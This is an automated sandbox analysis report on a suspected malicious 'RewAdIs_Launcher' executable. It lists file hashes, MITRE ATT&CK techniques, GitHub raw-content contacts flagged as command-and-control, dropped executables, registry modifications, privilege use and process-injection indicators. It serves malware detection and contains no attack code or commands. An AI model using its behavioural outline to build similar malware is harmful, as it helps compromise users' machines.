b3c27c4c4db1ee499afb4de38367c45d4c1a00c3878fc3ba3061a44f5fbc27da

Resubmissions

21-07-2024 15:04

240721-sfz21atgld 8

17-06-2024 07:34

240617-jd8fxsvaqn 7

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
21-07-2024 15:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RewAdIs_Launcher_v05.exe
Size

1.2MB
MD5

053487a5f68d7bb1a8fb36d07edef428
SHA1

799a6e4be54ad869319011380df12b6368024f08
SHA256

6c957cd9581d6c18df39a3b458ff6ac4d8b388cb7b66fb97ba4d314334493029
SHA512

f07722d73238226d04dad7f54b99c2f28f045d08b39d0e6133bd84a8d7316b6a84c07a2dfd2f1953c91744a036ed96f7944d8d0b638a9e7a264761096e31f18a
SSDEEP

24576:1RaZROMOm8FN7TjsPnzt2heeRhQbJEOeamDZNuFf:fkxOm+7TjsPnztyDMmawu

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2364	RewAdIs_Launcher_v08.exe
4808	z.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
13	raw.githubusercontent.com
30	raw.githubusercontent.com
31	raw.githubusercontent.com
32	raw.githubusercontent.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral6/files/0x0008000000023495-7.dat	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	RewAdIs_Launcher_v08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000000add0ac508d2da010d364b030fd2da01b6bc54030fd2da0114000000	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	RewAdIs_Launcher_v08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	RewAdIs_Launcher_v08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	RewAdIs_Launcher_v08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "2"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	RewAdIs_Launcher_v08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "3"	RewAdIs_Launcher_v08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	RewAdIs_Launcher_v08.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	RewAdIs_Launcher_v08.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	RewAdIs_Launcher_v08.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff	RewAdIs_Launcher_v08.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3812	msedge.exe
3812	msedge.exe
4560	msedge.exe
4560	msedge.exe
4560	msedge.exe
3264	identity_helper.exe
3264	identity_helper.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2364	RewAdIs_Launcher_v08.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4560	msedge.exe
4560	msedge.exe
4560	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	4808	z.exe
Token: 35	4808	z.exe
Token: SeSecurityPrivilege	4808	z.exe
Token: SeSecurityPrivilege	4808	z.exe
Token: SeTcbPrivilege	4972	svchost.exe
Token: SeRestorePrivilege	4972	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
1224	RewAdIs_Launcher_v05.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe
2364	RewAdIs_Launcher_v08.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1224 wrote to memory of 4368	1224	RewAdIs_Launcher_v05.exe	84
PID 1224 wrote to memory of 4368	1224	RewAdIs_Launcher_v05.exe	84
PID 4368 wrote to memory of 4484	4368	cmd.exe	86
PID 4368 wrote to memory of 4484	4368	cmd.exe	86
PID 1224 wrote to memory of 2976	1224	RewAdIs_Launcher_v05.exe	90
PID 1224 wrote to memory of 2976	1224	RewAdIs_Launcher_v05.exe	90
PID 1224 wrote to memory of 492	1224	RewAdIs_Launcher_v05.exe	92
PID 1224 wrote to memory of 492	1224	RewAdIs_Launcher_v05.exe	92
PID 1224 wrote to memory of 404	1224	RewAdIs_Launcher_v05.exe	94
PID 1224 wrote to memory of 404	1224	RewAdIs_Launcher_v05.exe	94
PID 404 wrote to memory of 1768	404	cmd.exe	96
PID 404 wrote to memory of 1768	404	cmd.exe	96
PID 1224 wrote to memory of 1876	1224	RewAdIs_Launcher_v05.exe	99
PID 1224 wrote to memory of 1876	1224	RewAdIs_Launcher_v05.exe	99
PID 1876 wrote to memory of 2364	1876	cmd.exe	101
PID 1876 wrote to memory of 2364	1876	cmd.exe	101
PID 2364 wrote to memory of 4624	2364	RewAdIs_Launcher_v08.exe	102
PID 2364 wrote to memory of 4624	2364	RewAdIs_Launcher_v08.exe	102
PID 4624 wrote to memory of 3316	4624	cmd.exe	104
PID 4624 wrote to memory of 3316	4624	cmd.exe	104
PID 2364 wrote to memory of 892	2364	RewAdIs_Launcher_v08.exe	105
PID 2364 wrote to memory of 892	2364	RewAdIs_Launcher_v08.exe	105
PID 2364 wrote to memory of 1036	2364	RewAdIs_Launcher_v08.exe	107
PID 2364 wrote to memory of 1036	2364	RewAdIs_Launcher_v08.exe	107
PID 2364 wrote to memory of 4240	2364	RewAdIs_Launcher_v08.exe	110
PID 2364 wrote to memory of 4240	2364	RewAdIs_Launcher_v08.exe	110
PID 4240 wrote to memory of 2292	4240	cmd.exe	112
PID 4240 wrote to memory of 2292	4240	cmd.exe	112
PID 2364 wrote to memory of 3968	2364	RewAdIs_Launcher_v08.exe	114
PID 2364 wrote to memory of 3968	2364	RewAdIs_Launcher_v08.exe	114
PID 3968 wrote to memory of 3012	3968	cmd.exe	116
PID 3968 wrote to memory of 3012	3968	cmd.exe	116
PID 2364 wrote to memory of 1216	2364	RewAdIs_Launcher_v08.exe	120
PID 2364 wrote to memory of 1216	2364	RewAdIs_Launcher_v08.exe	120
PID 2364 wrote to memory of 1212	2364	RewAdIs_Launcher_v08.exe	122
PID 2364 wrote to memory of 1212	2364	RewAdIs_Launcher_v08.exe	122
PID 1212 wrote to memory of 4808	1212	cmd.exe	124
PID 1212 wrote to memory of 4808	1212	cmd.exe	124
PID 2364 wrote to memory of 4504	2364	RewAdIs_Launcher_v08.exe	126
PID 2364 wrote to memory of 4504	2364	RewAdIs_Launcher_v08.exe	126
PID 2364 wrote to memory of 3032	2364	RewAdIs_Launcher_v08.exe	128
PID 2364 wrote to memory of 3032	2364	RewAdIs_Launcher_v08.exe	128
PID 2364 wrote to memory of 4052	2364	RewAdIs_Launcher_v08.exe	130
PID 2364 wrote to memory of 4052	2364	RewAdIs_Launcher_v08.exe	130
PID 2364 wrote to memory of 2148	2364	RewAdIs_Launcher_v08.exe	132
PID 2364 wrote to memory of 2148	2364	RewAdIs_Launcher_v08.exe	132
PID 2364 wrote to memory of 4500	2364	RewAdIs_Launcher_v08.exe	134
PID 2364 wrote to memory of 4500	2364	RewAdIs_Launcher_v08.exe	134
PID 4500 wrote to memory of 3540	4500	cmd.exe	136
PID 4500 wrote to memory of 3540	4500	cmd.exe	136
PID 2364 wrote to memory of 4560	2364	RewAdIs_Launcher_v08.exe	149
PID 2364 wrote to memory of 4560	2364	RewAdIs_Launcher_v08.exe	149
PID 4560 wrote to memory of 3312	4560	msedge.exe	151
PID 4560 wrote to memory of 3312	4560	msedge.exe	151
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152
PID 4560 wrote to memory of 2508	4560	msedge.exe	152

C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v05.exe
"C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v05.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Windows\system32\cmd.exe
